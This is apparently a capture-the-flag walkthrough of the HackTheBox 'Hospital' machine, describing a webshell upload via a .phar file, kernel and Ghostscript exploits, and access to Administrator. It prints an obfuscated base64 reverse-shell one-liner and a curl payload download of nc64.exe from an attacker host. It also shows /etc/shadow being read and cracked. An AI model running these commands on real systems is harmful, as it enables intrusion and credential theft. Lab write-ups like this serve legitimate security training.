hospital htb

Hospital HTB Writeup | Hackthebox

Introduction 👋🏽

In this post, Let’s see how to CTF the codify htb and if you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

Nmap Scan

Start by scanning the ports and services initially.

nmap -p- -sV <target>

We’ll observe multiple open ports and prioritize Port 8080 and 443 first.

The website typically operates on port 8080. We follow the flow before seeking membership and logging in.

File Upload

It appears the website allows file uploads, so let’s attempt to upload a file.

[Click Here] To learn more

Once numerous file formats have been uploaded, you’ll discover the possibility to upload a .phar file instead of a .php one. The subsequent move involves triggering the file shell, followed by initiating the fuzzing process.

dirseach -u [ URL ]

Once successful fuzzing occurs, you’ll notice the presence of uploaded files. Let’s attempt to access them.

Upon observing, it becomes apparent that we can access the webshell. Following this, let’s proceed with setting up a reverse shell.

echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMy80NDQ0IDA+JjE= | base64 -d | bash

Once the reverse shell is established, ensure its stability by executing the command:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

Following that, utilize the command below to search for usable files and ensure nothing appears suspicious:

find / -perm -u=s -type f 2>/dev/null

Next, conduct a search for Kernel Version exploits, aiming to uncover the Overlay vulnerability.

uname -r

In a specific version that seemed potentially vulnerable, I noted the CVE number to search for the corresponding exploit.

[Click Here] To Learn More

[Click Here] To Learn More

which we will have root already, after that let’s check /etc/shadow

After that, take the hash and crack it.

The cracking, we will get a password. After that, login at 443.

User Login

We will see that it is a mail sending website and there is mail sent to us, all in all it is sent as an .eps file which uses ghostscript to run, after that we find an exploit.

[Click Here] To Learn More

Following that, employ the Curl command to verify whether the nc64.exe file has been extracted or not.

python3 --inject --payload "curl [ IP ]:[ PORT ]/nc64.exe -o nc.exe" --filename file.eps

After getting the .eps file, send the file to dr.brow.

We will see that the file has been extracted and then we can do a Reverse Shell.

Root User

Once the edited .eps file is sent using the nc.exe command for the reverse shell, you’ll notice the successful reception of the connection back.

Once the reverse shell is established and the data is accessible, running ghostscript.bat will enable the discovery of Dr. Brown’s password.

Attempt to use the username and password for dr.brown to access the system. Upon successful entry, you’ll discover access to the rpc. Proceed with enumerating the system.

RPC Client Enumeration [Learn More]

Once connected, utilize the command “querydispinfo” to examine the data. You’ll notice that Administrator Information is shared with the Guest.

We attempt to upload a webshell onto the web service to investigate the permissions it operates with in xampp\htdocs.

And then do Access Webshell through the web page.

Once inside the Administrator Folder, you’ll find the root flag readily available.


According to me this box is a 4.5 out of 10, Hope you like it ❤️ See you in the next box…

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site


Scroll to Top